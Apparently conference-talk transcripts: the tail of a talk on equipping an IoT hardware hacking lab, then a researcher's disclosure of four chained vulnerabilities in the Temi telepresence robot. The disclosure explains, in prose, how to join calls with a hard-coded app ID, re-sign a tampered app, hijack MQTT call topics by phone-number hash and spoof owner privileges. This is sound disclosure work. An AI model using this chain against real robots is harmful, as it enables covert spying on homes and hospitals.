which is a subset of J tag that is also like sir wire debug. But so, so if you're like me and you can't memorize all these pins on everything actually doing a print out and stick them in the back is a nice little feature that I use to help speed me along. But again, it's a great product. And for mainly arm processors, I go to on this. But then also I will use various debuggers for different process. So if you TTI TI chips, the CC debugger I can't remember what this was $20 $30 it wasn't that much. It happened to be a case where I was dealing with some TI chips and I'm like, I just buy the thing, put it in my lab I have it. Another one which we demoed last year. And that was dealing with the XDS XDS 110 which is another TI debugger. I really didn't want. And I wanted to expose people to the XDS 110 from a debugging standpoint but I didn't want to buy the full blown one. This is like 110 $120. But it turns out that they made the small development kit type thing for a sensor tag. And the one you buy for that is basically a stripped down model. There's no case, there's some features turned off, but it works the same way. This was like $15 versus $100 and it worked pretty good. And I kind of got this idea, because I bought, I was doing some research on a TI chipset and I for a vendor. And so I bought the development kit and development kit had an XDS built into the chip on the development kit, which got me interested in doing this and that's why I kind of shared that stuff last year and I want people to do the hands on. Now I have a number of debuggers around here but you know a debugger is what it is. It's a debugger. Typically what I do is when I encounter a chip set. The first thing I do is I go out and go okay. If I was a developer on this product line for this chip set. How would I do it. What product would I use. What does a vendor recommend for interacting with their hardware. Their chips and then I go out and check it out. Do they have guidelines for using a J link, then I use a J link. Do they have a specialized debugger like pick processors do which is basically in circle serial programming. It's basically SPI. If that's the case then get those so I have I have several of those laying around here. The pick kits is what they're called. So I try to find out what the developer community uses for a particular product. And if I can afford it and it's inexpensive I buy that or I buy the next. Alter level alternate to actually use and that's typically the approach that I use. I found out if I'm trying to deal with the chip set and I'm using somebody else's debugger. It has a tendency to not always do what I expected to do. It doesn't always give me the information that I get from the development community on the product, or from the vendor on the product. And it adds a level of complication. And I'm able to find way more resources. If I use what the development community uses on that product. But the reality that's not always feasible. There's been a number of times where I've gone hey here's a chip. You go out and you try to find out what the development community is using for and find out it costs $10,000. And you can only buy it from the vendor in cases like that then hey if it's an arm is an arm if it's something else. You know, go go all the way down and use, use one of these and then use open OCD if you have to whatever it takes. But I tend to see have to dive into what the actual person producing uses. I want to move on real quick because we're running a little behind and I want to get this next phase, because I know the. Well, matter of fact, never mind we can do that getting questions. But looks like one question cropped up here. Josh asks, do you happen to have any books, videos or any learning material that you recommend to start learning IOT hacking. Oh gosh. That's kind of a hard one. I've, I'm not a, I'm not a big book person. To be honest, what I typically do is I'm definitely a Google and YouTube kind of guy. And everything that I've wanted to learn, you know, an example, I wanted to learn how to re solder a T sop 48 pen chip back onto a circuit board I'm like, Dan this is going to be hard I can't go solder each pin. So I went on went on YouTube and looked it up and go how do I do this and there's like three or four videos out there and then I watched those videos. And I said, well, I'm going to do it in the same way. If I want to learn how to use you are it I go check out some of the videos on finding you are and looking for you are same way with logic analyzers. And it's a typically the approach that I do and I still do that to this day. I'm working in an engagement or testing a product. And I go, hmm, how do I interact with this. I haven't done this before, because, you know, even though I've been this in four years, I constantly encounter things that I haven't encountered before. I first I go out and find out who else has done this has it been done before has anything similar to it been done before. And that's kind of my approach. If you're trying to, and I know there's a lot of learning kits out there. I'd also recommend, gosh, where is that? I would recommend looking at some inexpensive products just to play around with. And I'm going to throw some pictures up here. And like these, these right here, Vix me 300 millimeter router type things. That's one of these things out here. Well, that's one thing about my lab. It's like a ton of gear. So this one actually uses it's a little router device. So we have these chips on here. So it has a lot of things you can interact with. There's ethernet. There's usb. It actually has you are. So you are it's actually marked on here if you look there's it says TX and RX and then I found the ground. This runs open WRT. It actually has a flash memory chip right here. So here's a chance to figure out how to get the memory out of the device. Here's a chance to play with this in this case here. ROOT doesn't have a password on it. So in that case there you really soon as you get the console it's going to be root level access but you can change that and then try to get around it. This device is like 20 bucks. And I would recommend getting something like this and starting out by just going hey this is a meta tech chip. What does that mean? This is a ram chip. Find the data sheets. This is a flash memory chip. Find the data sheets. Read those data sheets and kind of learn and play around and experiment. And if you screw it up, throw it in the trash can and go spend another 20 bucks. Hopefully that answered the question. Okay, here's another one but I don't think the GL Mango is even available anymore but it's the same product just relabeled different. Another question cropped up here was, I think it's kind of an extension of that question. Do you have any go to YouTube channels. Do you follow anyone on social media? Oh gosh. Yeah, from social media I am a Twitter guy. So you can find me on Twitter. My handles percent P E R C ENT underscore X. Yeah, please follow me. If you're one it tweets a lot of political stuff. There's nothing wrong with that. I just not a big fan of that just to be aware of it. I want to see mostly technical stuff. So if you're doing technical stuff out there. That's kind of cool. I'll probably follow you back. But yeah, that's one thing I do. I do not follow any YouTube channels. I'm usually all over the map whatever I'm working on at that time. And I need to learn something specific then I go out and search and I never look at one single example if there's a dozen examples out there. I'll usually look at three or four of them and get three or four different few points on how to approach something or how somebody's done that. And then experiment with my own ways and own methods and try to build from that. We've also at rabbit seven I put out a number of blogs. So if you use my name, Daryl Highland and search for a rapid seven blogs. I think we put out a whole series last year actually pulling firmware from microcontrollers like four of them covering four different type of microcontrollers. For different software packages for different debug type devices. So, every once in a while, I'll do that type of stuff too. Okay, so I want to move on to odds and ends. This is kind of a big one. So, when you're doing work on devices it comes down to often needing a lot of strange stuff. Now the first one is wire. I don't know how good the video is out there but this is 40 gauge wire. And to be absolutely correct about this, I hate this shit. But this stuff comes in handy for soldering into microscopic small circuits for tapping into them. So, currently I'm working on a project right now where I have to tap into an Intel i3 processor. I'm trying to. And the only way to do it is the pads are like point three millimeters. So I am actually using this under a microscope and soldering it up. And at the end of this thing here I'll show you what I attach it to when I'm done, which will be a lifesaver. So that comes in handy. If I'm doing something else is bigger from a wire standpoint, I use this wire wrap wire. I don't even a VT corporation. And I found this it comes in all of these distance strands. This is covered with a really fine plastic coating. That 40 gauge wire earlier was covered with lacquer, real thing code of lacquer. Keep it from short now. This stuff will melt that's on the outside of this. But when you're looking for like 30 gauge wire, you need to find wire wrap. If you buy standard 30 gauge wire, the actual insulation going around the wire will be thicker than the wire itself and will get in the way when trying to solder to small circuit pads to tap into it. The other thing is, you know, when you open up a device you start thinking about headers you need to attach headers. And this become a nightmare over the years or at least early on when I first started, because I was seeing all kinds of stuff. I went out and tried to get samples of both 2.54 millimeter headers. So this can be plugged into the board and soldered in and then you just plug into it for the places there are headers. What if there happens to be dual header. So then I bought some dual headers to have those I have boxes of these things laying around. So on top of that what happens if it's a surface mount header for 2.5 more millimeter. So if you look at this it actually has see how the bottom is sticking out there. It's actually gall winged. So there you go. And then we do the same thing for 1.27 millimeters single, single row. Double row. And these are the most common and trust me there's people that produce other headers that you want to kill them when you get them because these things won't fit in a gall wing one. So yeah I went out and kind of purchased all of this stuff. Over time I didn't do it in one day. It's like hey I need headers there 1.27 I need gall wing headers and then went out and bought them. The other thing that is a lifesaver. And that is glue. And it comes in really handy because when you're attaching small wires to a board, and you snag the wire you pull the wire you could easily rip the pad clear off the board, which will happen to you anyways but this will help prevent it. This glue here works like a champ. So here is. Here's some 30 gauge wire that I've attached to this device here. And you can see. Hold on a second I'm looking for a poker here. So right here you can see this is glue. So I put a dab of glue on there and it holds the wires and it prevents me from tearing the pads out from this circuitry. It works like a champ. If you need to move the glue, it peels right off takes a little force but it'll peel off clean off the circuit board is actually brilliant. For what you need to do. Some of the other things that we're going to need you're going to need wire. So these are jump wires you can get these male to male female to female and they just peel off. So I have bundles of these and when I'm done using one, I throw it away because if you keep plugging it in plugging it in plugging it in after by the end of the day it'll start weakening to the point where it will give you problems you keep trying to use it. There's nothing worse than losing three or four hours trying to figure out why something is working find out your plug is just four out so I usually get bundles of these. And then you'll find them scattered all over the floor because I just throw them on the floor when I'm done. I'd also recommend breakout boards, quick breakout boards are for quick for doing various projects and stuff like that. And that's kind of a sweet. And then let me see. Oh, gosh, here's here's some stuff I bought on a project a while back. I ran into a project where I need us bees. So, literally without and bought usb breakouts. So you can buy these little kits for like five, six bucks. Okay, and it gives you the ability to do usb breakouts, so that you can solder up connections on these things and be able to tap into various usb's kind of the reason why I needed that it turned out that the device. That I pulled apart. That was an industrial device and it had as a solid state drive in it the solid state drive wasn't a a a t a it was basically usb. And it was kind of a weird wire out wire out structure. So from here I was able to jump it out the way I wanted it to to fit usb properly. And was able to use that to tap into the actual device and effectively be able to read the data off of it pretty effectively. So that worked pretty good. Here's some. These are a little expensive but they've come in handy a few times these are micrograbbers. And they go, I can use them on a logic analyzer or some other kind of testing equipment I have a set of these that I've put together. I think these were like 20 bucks a piece but they have a point five millimeter pitch comes in handy for small stuff. And then the big item, I think this is really critical. This is a test board. I built these. And I would recommend building test boards to meet your particular needs in the projects you're working on. It'll come in to be very vital to actually be able to do it. So if we look at this from this test board we have two sides of this. So we can take the wire and we can hook into here. These are screw terminals. So you can screw the wire in here and instantly you have two headers to put test equipment on. This one over here is similar. This one has jumpers in the middle. This one's isolated with a switch. And these are isolated with jumpers. So once you attach the jumpers or throw the switch, you get connections all the way across. So if it's turned on, then I basically get four headers I can tap into. This also makes it possible and where I've done interchip communication testing where I actually come off the circuit board here. I route through here and I go back to the circuit board and then I cut the runs on the circuit board making all the traffic flow through this and it gives me the ability to turn on and off the flow on a circuit board for analysis and ability to hook multiple pieces of test equipment up for analysis. And again, I built these. Get these boards. You can see where they're broke right here so that they require a switch or a jumper to do them. And these come in extremely handy. I've built four or five different ones, but having these screw terminals are a lifesaver for connecting up things. So I'd recommend building some of your own jigs and test equipment. Any questions? It looks like a high level question kind of cropped up here. This was with regard earlier to when you're speaking towards like the FTDI devices. The question is, what software do you use in order to start talking to these devices and again this is with regard when you're talking about the chicro those types of hardware devices. So if you're using the chicro, if you're using JTAG, then you're obviously going to use like OpenOCD is probably one of the best ones that you're actually going to use is OpenOCD for it. When it comes to UART, there are so many console programs out there. It's literally kind of hard to say which one is the best one. I have a tendency to use, gosh, cool term, and I use it on my Mac. If you're on a Linux system, I would just use screen for interacting with a USB UART connector as an example. For the logic analyzers, the manufacturers produce software called Logic, say like does. There's the older version and there's Logic 2, which is pretty good. So for standard UARTs, again, there's tons of programs out there. Find the one that works best for you. And or if you're on a Linux box, just use screen. Screen has the ability to interact with TTY USB 0, TTY USB 2, 1, ever how many UARTs you have connected up and also set the associated bald rate right within screen. When you get into logic analyzers, like J-Link, J-Link produces its own, not logic analyzer, I'm sorry, debuggers. J-Link produces its own software, same way with CCD bug. Also, individual manufacturers of certain chips will produce their own software to interact with their chips over J-Link. Nordic is one of them. Nordic produces software to connect to their NRF 51-52 series chips. They can get it as a command line or you can get it as with a user interface type thing and it actually will leverage the J-Link. So a lot of the manufacturers will also produce custom software to interact with their chip using no standard logic analyzers or debuggers that are available out there. Any other questions? That is it. All right.
This learning session will focus on the subject of building an IoT hardware hacking lab. During this learning session various tools and technologies will be shown and discussed that are needed for physical disassembly, soldering, debugging, and analyzing. Covering the basic entry level to the more advanced lab equipment needed and used. After each learning objective we will have Q&A sessions.
10.5446/50729 (DOI)
Hello, IOT village, first and foremost. What it be, what it do, I'm Mark and boy have I got some zero days for you. Now the reason why I call this talk assembling Voluntron isn't just because I'm hacking a robot and it's a cool name and incredibly clever too, but also because there's four unique CVEs in this target and when they work together they kind of create something that's greater than the sum of its parts, just like a mech you might have heard of. So the next thing you might be wondering is who are you and why should we care what we have to say? Well to start off like I said I'm Mark, which is really only one natural response and you can find me on Twitter at Robcicle and I'm a currently security researcher from McAfee's advanced threat research team which I'll be referring to as ATR from now on because it's kind of a mouthful. Now my focus has been on finding zero-day vulnerabilities particularly in embedded systems so this talk is really on brand for me so to speak. Now as for previous experience I spoke at the last year's DEF CON and ICS Village so I'm basically a celebrity. Now for hobbies I really only do two things, I hack and I squat. Now depending on how nice you guys are to me and the Discord channel after I might add streaming to that list but for now it's just those two. Okay so let's move on to the target. Temi or Timi or however you want to pronounce it. The fact is it's actually pretty cutting-edge piece of tech so the marketing describes it as the world's first truly intelligent mobile personal robot for your home. That's a lot of qualifiers and as you can see here it's actually a pretty small device it's about four feet tall and it's got kind of like an Android brain that's like an Android tablet at the top with a camera and a microphone and a fully functioning touchscreen. Now this device was created by a RoboTemmy Global LTD and they're sort of like a startup company this is their first venture into like the consumer space but they actually spun off of a parent company called RoboTeam which is the military robotics based out of Israel. Now this thing isn't cheap it's gonna set you back about two grand but you do get a lot of hardware for that price point so you get it has the ability to do remote teleconferencing thanks to its camera and microphone but more importantly also has autonomous movement and obstacle detection thanks to the various sensors it features and also the 360 LiDAR. And finally as you'd expect it has a Alexa and smart device integration being a smart IoT device and you get all the standard things you'd expect from an Android tablet Wi-Fi, Bluetooth, it even has a wireless charging pad on the back that doubles as a coaster at least for us. So although RoboTemmy likes to advertise their robot as being you know sort of a consumer device the reality is that it's actually seen a lot of use outside of that space so I think one of the biggest things we've seen recently is that it's used sort of as a mobile kiosk so in places like the Mall of America and the Nautilus Hotel and even in certain corporate environments like Transfighter corporate offices you'll see that it serves as an informational kiosk that has the advantage of being able to show people around so instead of just telling people where to find you know like Jimmy John's in the mall for example it can actually navigate them there. But perhaps the most important and impactful application of this robot is in healthcare especially given the recent pandemic so with doctors visits becoming more and more you know the standards are becoming more remote visits and remote you know teleconferencing for doctors appointments this has actually seen a lot of pickup in the healthcare space so already we're seeing it being used by places like Trillium Health Resources in fact it's also been picked up by the Israel's Ministry of Defense as like the de facto us teleconferencing solution for the medical wards throughout Israel and we also see a lot of applications in Southeast Asia of all places with places like China and South Korea you know ordering hundreds of these units for their nursing homes and medical institutions and to accommodate this increased demand Robo Temi has actually increased production of these units to about a thousand a month I believe to just to meet this growing demand in the medical space. So now that we know what Temi is what's what it's capable of and where it's being used it's important for us to sort of draw a bat a box about what the normal operations that look like so then we can have a lot of fun breaking that box. So to start off normal operation of the Temi is done through a use of its smartphone app and this is both on Android and iOS so you can call the Temi from it you remotely control it that way that sort of thing and the registration process for using this app is basically just put in your phone number and it verifies it and that's how I identify you so if you reinstall the app and use the same phone number it'll still find up your your account details. Now upon first booting up the robot which already was a super fun experience in boxing this thing but we are prompted to scan a QR code and this basically just turns whatever user scans that QR code into the de facto admin of that Temi robot and this the admin is only one per Temi and they have the sort of the highest privileges for that robot. That doesn't mean that other people can't call your robot or even use it phone contacts that they use the Temi app so phone contacts in like your smartphone if they have the Temi app installed they're synced automatically and this can be done one of two ways if the admin has phone contacts that have the Temi app they'll be synced automatically to the robot and the robot will be aware of them. Alternatively if you're just a regular user of the phone app they don't own a Temi but you have a friend that does for example and they're in your phone contacts list you'll be able to call your friends Temi robot from the app. We can sort of show you how that works. So once you boot up the app if it finds a contact that owns a Temi they'll show up down here on the left under your contacts list. So here we have a lab phone as one of the contacts that owns a Temi and by selecting this contact you can see the Temi robot associated with it and even has a button that lets you just call it straight from the screen. And then once a call is actually initiated this is sort of the interface you're presented with. You can drive the robot around, control your audio options, pretty standard stuff. Now calling is very much so the primo functionality of this robot and really callers get a lot of control over the device during the call. They get audio and video feeds from the Temi but they also have control of its movement which they can control manually using the little d-pad you saw but also has access to all of its saved locations. So this immediately became a very interesting potential attack vector to us. Now the Temi does ring when someone besides its admin calls it. So in that sense you know if you just added someone's phone number that they don't know you, it turns into basically just trying to cold call cell phone. There is one exception to this and the admins can actually grant certain users in their contacts list special privileges to bypass this limitation. So if you have like a family that always the same robot and you can be bothered with having to pick up on the other end each time, an admin can grant several other users the ability to call in without having it ring. And this is also done through the phone app. You can just invite new members and then select whatever contacts you want to be able to control the robot whatever they want. So now we have a good grasp of what the normal operation of this device looks like. We can sort of get into the spirit of it trying to hack this thing now. Now although this attack is pretty novel and cutting-edge in a lot of ways the approach we took to reconnaissance was fairly standard and typical. So we started with trying to get a local shell on the device. This was actually super easy and short-circuited by the fact that the device comes with developer options which include ADB or Android debug bridge which allows you to remotely connect to it like you would an SSH session. So that already made lives a lot easier for moving files around and accessing the device at startup. The next thing we tried to do is actually capture traffic on the device using wire shark. And during like stuff like boot up and during phone calls we saw three IPs being hit pretty frequently. One of these mapped to a Yahoo URL so this is probably being used for its news app. And then two more mapped to Amazon AWS instances which while not surprising don't really reveal much either. The next thing we did was used our ADB shell to actually run and sorry not ADB that's a little later. We ran an Nmap scan port scan on the device to see what the ports it was listening on. Another standard thing you do for attack vectors. And the only port it identified as being open was the port 4443 which Nmap classified as being used for the service pharaohs which is actually related to printing. So this is probably a false classification. It's more likely that this port is being used as an alternative to the standard 4443 you'd see used for HTTPS. Now to verify that we actually used the ADB shell we had to the device to run a net stat and actually found that the service associated with this port is something called com robo team teamie USA which looks a lot more like an Android application than it does you know a standard Linux binary. And sure enough that was the case by parsing the list of pack installed packages on the device we actually found the APK associated with this Android application and using our ADB shells trivial to pull this to pull this APK off and start examining the software. So now that we had access to the software and we also had access to the phone app software at this stage as well because we could just download the APK from the Play Store it's completely free and you don't even need to own a temmie to run it so we could start looking at both of those at the same time. Now the rest of this is really going to be like 80% reversing and static analysis that's just sort of the nature of this project. Now why might you ask why? Well a great man once said the road to exploitation is paved with months of staring at decompiled Java code. That man's name Albert Einstein. So who am I to argue with that? Now once we actually got to decompiling the code we decided to use a program called JADX and JADX was a sort of a favorite of ours because it has a functionality of being able to right-click on any symbol and click on it to find usage which became really important later on. From there we had to pick a vector. Now I don't know how many of you have actually looked at reversing a full Android app but they have massive code bases frequently and temmie was no exception. Instead of groping in the dark we decided that we needed to sort of hone in on a specific subset of the code to refine our search. In our case we were already interested in the calling functionality of the robot since that would grant us the greatest level of control entirely remotely. So we began digging through the different libraries that are part of the APK. After googling around a bit the one that jumped out of us particularly was something called the lib agora and this is actually a binary related to the agora video SDK which is a third-party library used specifically for video calling functionality. Okay that's perfect that's exactly what we're interested in. So from there we needed to find an entry point related to the attack vector and you can sort of imagine this as being like a strand on like a wool sweater the thing you start pulling on to really unwind unravel the whole thing. So we began by actually pulling up this library in Ida and looking at its exports and immediately the function native join channel jumped out at us. It looked like something related to joining a chat room for example. Opening up the APK now we saw the same function with the same signature appear in the decompiled app. So that was a good sign. So from there we could use JADX's find usage feature like about 600 times to sort of begin tracing the the code path taken to for starting video calls. Now at this stage there really is no more advice or cool shortcuts it really is you just have to draw the rest of the L. You really have to just put in the legwork to trace the different function calls that are being made in order to get a better understanding of how the code works. But the fruits of the our labor in this case was actually pretty impressive. It's sort of like staring at the sun so I'll only show it briefly. Did you catch that? Alright let's take a closer look at it. So highlighted in the different colors near the top are the different entry points for the calling code. So there's four ways to initiate a call from the phone app and that correlates to these four. You can call a phone contact, you can call a robot contact, you can call either contact from the recent calls list and if you happen to be a Temi admin you can also call your specific robot. Moreover we decided to segregate these based on the code flow that's either for outgoing calls indicated in red or incoming calls indicated in blue. And I'm not going to go through this too deeply because it's sort of massive but this did serve as a good reference point for us all the reversing we have to do later. Okay so we have four vulnerabilities to get through so let's just jump right into it. The very first one both chronologically and in terms of complexity is the CVE ending in 7.0. And we can see here that it's categorized as being a use of hard-coded credentials and as present in the Temi Android app. Now to have a better understanding of what this vulnerability entails let's go through the process we used to actually discover it. So this really consisted of four easy steps RT FNM. I do mean that pretty literally like just by looking through the Agora documentation for their video calling API we were able to get 80% of the way to find this vulnerability. So specifically we decided to take a second look at that join channel function we saw earlier. According to the Agora documentation it has two required parameters and two optional ones and this is really all that's needed to join an existing video call. Now the first one is something called a token and it seems that a token if the user uses a static app ID the token is also optional it can be set as null. This was interesting to us and the second required parameter for joining a channel is a channel name this is something you will touch on a bit later. For now we were interested in the static app ID and whether the Temi was using a token at all. Taking a look at the same function in the code we found that it is indeed setting that token parameter to null which means that it's likely using a static app ID as indicated in the documentation. Okay so then we decided to start looking for this static app ID where could it be found? Referring back to the Agora documentation we found the one function or the one API call that actually uses it as a parameter and that's the RTC engine dot create function and it uses it as a parameter and it describes it as being an app ID issued by Agora to the developers which is sort of vague but after some more digging we sort of discovered that this is used as a sort of namespace that segregates different users or different implementations on the the Agora remote servers. So what it means is that you have a set static app ID that's shared amongst all Temi robots and Temi phone app users and the app ID ensures that users of that service can only call other Temi users they can't call other an arbitrary you know Agora client. So this is actually a pretty important credential to have access to. Well since we knew the function that takes it as an argument we decided to look for this function in the Temi's decompiled code and sure enough there was the app ID hardcoded directly into the app that's freely accessible at the Play Store and fairly trivial to decompile. So this was already a good start but really to exploit this as a vulnerability we needed not only the app ID but also the channel name so we could actually join an existing call potentially. So if we still needed the channel name how could we get it? Well by going through that nice little graph I showed earlier we were able to trace down what function actually generates the channel name and here it's being called a session ID but they're really the same thing and as you can see this is doing something not too complicated it's actually just generating a random six digit value. Now this is important because you know 900,000 possibilities may seem like a lot but it's well within the range of brute-forceable attack vectors. So in theory an attacker could use the hardcoded app ID the extracted from downloading the app which is shared amongst all Temi installs and then they could just use a brute-force method to try and guess every single possible channel name and by doing so they could potentially intercept every ongoing Temi call used by any Temi install. Now obviously we couldn't test such a brute-force attack vector against a live production server but what we could do is we could create a custom agora app to join a Temi call just launched locally and we did this by logging the channel name using ADB and sure enough using this custom app we were able to to join the existing call and essentially spy on the other two call members so thereby proving this is a legitimate attack vector. So the next vulnerability I'm going to discuss is sort of a helper vulnerability. It is classified as an origin validation error and it is also present in the Temi Android app. Now the reason why we call this a helper vulnerability is that it actually is related to the fact that you can modify the Temi app and it still has full access to all the remote services it uses. It doesn't perform any kind of tamper checking to make sure that it's not running on a rooted device that the code for the app hasn't been modified in any way it just doesn't aware of that and the reason we were motivated to even pursue this as an attack vector is that it's much easier to modify an existing code than to start from scratch but more importantly the Temi Android app already has access to all those remote services which requires some degree of authentication. Instead of trying to extract the keys it's using and whatever other authentication mechanisms from the app and trying to make it our own we just leverage the existing app and inject our malicious code into it. So the way we to accomplish this is by first unpacking the APK which we can do using APK tool. Next we would search for the particular piece of code that we want to modify. This could be either through the decompiled code or through the various resource files included with the APK. As a proof of concept we decided to try and change the text for the call button which we found through some grabbing. Okay so now that we knew where which part of the APK we wanted to change the next thing was to simply make that modification and that was as simple as pulling it up in a text editor and replacing the string with what we wanted. In this case we decided to rename it Pound give it a little more spice and the last but not least we had to repack but also re-sign the app and the reason why we need to re-sign is Android allows does not allow apps that are not signed to be installed on the device and by modifying the existing apps contents we invalidated the existing signature but no worries since the signature is not being checked by the device there's no reason why we can't just create our own signature and use that. So the repacking process is once again done using APK tool and then we create a signature using a combination of key tool and jar signer as shown here and the end result was that we were able to successfully change the string on this call button when perhaps more importantly modifying the app in this way proved not to impact this functionality though in the least meaning that we could potentially make non-trivial changes and still be able to perform things like calling. Now exploitation of this vulnerability is a little tricky without spoiling the rest of the presentation because really it's main application is used to help exploit the next two vulnerabilities so we'll save that discussion for them. No spoilers. Okay vulnerability numero trace so this one is actually missing authentication for a critical function a little more serious than the last two and this is actually present in Temi's MQTT broker which if you don't know what MQTT is I'm going to give you guys a real quick crash course on it just we're all on the same page. So MQTT is a published subscribe messaging protocol that's specifically designed for IoT and other lightweight devices so it's not too surprising to see Temi using it. Now the way it works is that clients will publish messages to certain topics and then subscribers to those topics then receive the messages. You can think of it as sort of being like a subscribing to a YouTube channel and then receiving notifications whenever your favorite YouTubers upload for example. And then the topics themselves are strings that are organized into a hierarchy and the hierarchy itself is delineated much in the same way that a UNIX file system is so just forward slashes. Now in terms of the Temi it uses MQTT for basically all communication between itself the phone app and the various cloud services so you see it being used for things like video call invitations, sinking contacts from the admin, and even most importantly privilege management which is something we'll delve into in the next vulnerability. So let's get into the discovery and exploitation of this vulnerability. How are we using MQTT and what authentication is not being implemented? Well we started by looking at the code that was used by the app to subscribe to us call invite topic. After all we're all interested first and foremost in the calling functionality. This is just a topic that either a phone app or a robot will listen on when it receives phone calls and then the person creating a call for that user will publish a message to that same topic. So in our case it takes the form you can see it being invoked here on line 408 that's the actual function that is used to subscribe to that topic and the topic string itself takes the form client something followed by invite and that's something in the middle is a client ID or an MQTT client ID rather. And an MQTT client ID is just a unique identifier for a specific client that's connected to the same MQTT broker. It's a way to identify different users. So this actually gave us an idea. If could we subscribe to someone else's call invite topic if we're able to modify the app. Well in order to do that we would need to know their client ID. So we would need to somehow get this information. But how are these client IDs even assigned? Well looking back at our how recent calls are initiated actually gave us a clue. So if you try to initiate a call from the recent calls list this is the call code that gets executed. Invokes a function called telepresence service initiate call and the first parameter is actually an identifier for the for the contact you're trying to initiate a call with. In this case it gets that ID by invoking a function called get MD5 phone number. At this point we were thinking is it possible that the client ID is just an MD5 hash of the phone number the user used to register. We decided to verify this theory. So we did this simply by taking the phone the Google voice number we used for our Temi admin computing the MD5 hash and then searching for that exact hash and all the various Temi files we had and sure enough we got a hit in one of the logs we recorded during a call and it classifies it right there as client ID. Seems pretty straightforward to me. Now we modified at this stage we decided to modify the app taking advantage of the previous vulnerability we outlined and using this technique we were able to successfully subscribe to another user's call invite topic instead of our own which basically meant that every single time they received the call we would get that same call and the only thing we needed to make this happen is the victim's phone number which telemarketers will constantly remind us is not a high bar. Okay so getting to the last and easily the most impactful vulnerability this one is an authentication bypass using an alternate path or channel and this is present in the Temi's REST API which is something we'll cover as well. Now in order to understand the authentication bypass we first need to understand the authentication and this is related to Temi's privilege management system which is something we've already sort of touched on with the admin versus regular context thing. So we already know about admins that's just the person that first registers with the QR code but there's also two other types of privilege levels. Another one is contacts which are just the default permissions given to a user it's also the lowest level. Now there are two ways to become a contact the first is simply by cold calling the Temi and the other is through the Temi admins sinking context to the robot. We'll be focusing on this latter use case. So the Temi robot actually listens on the topic sink contacts and then followed by its MQTT client ID or its robot ID that is the same thing for requests from the admin to sink contacts as we can see here. Now the requests themselves have the following structure they're called it uses an object of type sink contacts message and all this contains is a list of contacts and the client ID of the person sending the request and then the contact list is just a you know a tuples of MQTT client IDs and the display names pretty straightforward and the reason why the sender client ID is included is because the Temi locally ensures that the sender is equivalent to the ID of its admin just as a sanity check. Okay so that's contacts the third privilege level that's possible is something called an owner and owners are actually related to that functionality I showed earlier where you can add certain users as an admin and let them call into the Temi remotely without having it ring. So a Temi admin can sends request now sorry let me back up a bit here this is actually a little bit different from adding contacts because while adding a contact is pretty straightforward adding owners is a little more complex because the request sent by the admin from the phone app is actually quite a bit different than what the Temi expects on the receiving end. So the admin sends its request to arrest API at the following URL as we can see here and the request themselves have the following structure they contain an inner request and also a signature that's basically generated using the client's private key it's a way to identify who's the origin is and then the inner request consists the list of the users the list of users that we want to promote to owners the ID of the robot that we're sending the request for the source of the request a timestamp and then finally a type which is simply adding an owner or removing. Now how is this different from what the Temi expects to receive on the other end well it's quite a bit different first of all the Temi is listening on an entirely different channel while the admin is sending its request to arrest API the the Temi robot is listening on an MQTT topic this one specifically but and also the structure of the request this has also changed it seems to be a subset of the request that the admin is sending where it still has the list of owner ID is in the type but has been stripped of its signature its timestamp and its source now at this point we speculated that the reason for this is because the rest API itself is being used as an authentication mechanism for adding owners this is sort of a sensitive privilege escalation type of deal and so what the the rest API would do is it verifies the the request by checking the signature and then it strips out all that verified information before sending it off to the Temi's MQTT topic essentially serving as like a middleman so that means that our flowchart sort of looks like this and presumably if the if the verification server deems the signature invalid nothing happens okay so these privilege levels mostly have utility in how calling works so when a Temi receives a call from a user if that caller is either an admin or an owner the Temi will pick up the call automatically on the other hand if the caller is a contact it'll ring so unfortunately as an attacker if we just tried to cold call the Temi we would become a contact and the Temi would ring what do we want well we want to be able to call the Temi and have it pick up automatically this is because calling is sort of the end game you know you get full control of the the Temi's movement and also audio and video feeds to it so what do we already know and what do we already have that can help us get there well we do know that the Temi uses MQTT for calling and privilege management and we know that it can we can subscribe to arbitrary topics like we showed when we subscribe to someone else's call invite topic so our next question was can we also publish to arbitrary topics because if we could we may be able to escalate our privilege by publishing the owner's message that the Temi expects to get from the authentication server directly and just publish it right to that MQTT topic is listening on thereby bypassing that authentication middleman entirely well this all sounds well and good but there was a slight caveat here and that was the Temi will only process privilege escalation requests for existing contacts now why is this a problem well there's only two ways to become a contact one of which is the cold call the Temi which is far from ideal because that might arouse suspicion for various reasons if you have some stranger calling your robot and then the other way is to have an admin send the syncs contacts message with you on it those are really the only two ways well the solution is actually trying is that's the letter what we can do is we can actually spoof the admin sync contacts message by simply setting the sender client ID to the admins client ID since the Temi just implicitly trusted this value is accurate in this way we can send a sync contacts message first followed by an ad owner's message and then finally initiate the call of the robot so this is sort of what the the same functionality looks like after we've modified the app in the following ways we can see already that it's a lot simpler and in order to become a contact we just send the malformed request in order to escalate to becoming an owner we just send another malformed MQTT request and then finally unlike before now that we have owner privileges the Temi will pick up the call automatically now just as a quick recap of what these vulnerabilities can do together it's sort of a recipe for disaster and the recipe includes these following steps first you find a vulnerability in the Temi and then you just find three more and here's a completely unrelated graphic of a bucket with holes I just like buckets now the ingredients for this recipe involved just the user's phone number and honestly not much else and what this produces is the ability to spy on calls the ability to intercept calls intended for other users and most importantly the ability to remotely control the robot and see through its eyes and hear through his ears now I've been teasing you guys enough so at this point I think it's a good time to show you guys a demo of how this all works so I'm showing our Sam you guys could keep up the video hopefully demo is clean okay so on the left we have the Temi admin on the right we have the attackers phone and we can see that I've already added the admin as a phone contact thereby syncing it to the Temi's contact list and the first thing I'm going to do is I'm going to install the Temi app normally unmodified just straight from the play store just to show that there's no smoke and mirrors involved we'll later be using the modified app of the exact same credentials and go into the same registration process to show you that it really is the vulnerabilities that give us the greater privileges so once we're done registering it we're just gonna attempt a cold call the Temi and you can see the Temi screen in the bottom center there now as expected the Temi rings does not pick up automatically this is because we only have contact privileges at the stage the admin hasn't granted us any special rights okay now that we know what the normal operation looks like let's go ahead and install our custom modified app with leverages these vulnerabilities and right off the bat you'll see this actually looks very similar to the original app we only modified what we needed to do it's not until we initiate a call that we'll see how different it is so as I stated previously we'll be using the exact same credentials to register and in theory we should have the same privileges all right now the registration is done we'll try to initiate the call again except this time it says PON instead of CALL so you know it's no work this time the Temi picks up the call automatically and the attacker now has full access to the Temi's movement its camera and its microphone now the first thing an attacker might do is actually mute the microphone their microphone I mean and the turn off their camera thereby essentially remaining anonymous as they do this and you can start driving around whatever location it's in start looking around at whiteboards and other sensitive information and you can also you know modify its volume to annoy people but more importantly you can actually navigate to his various saved locations so here we're gonna navigate to its back to its home base just so it doesn't run out 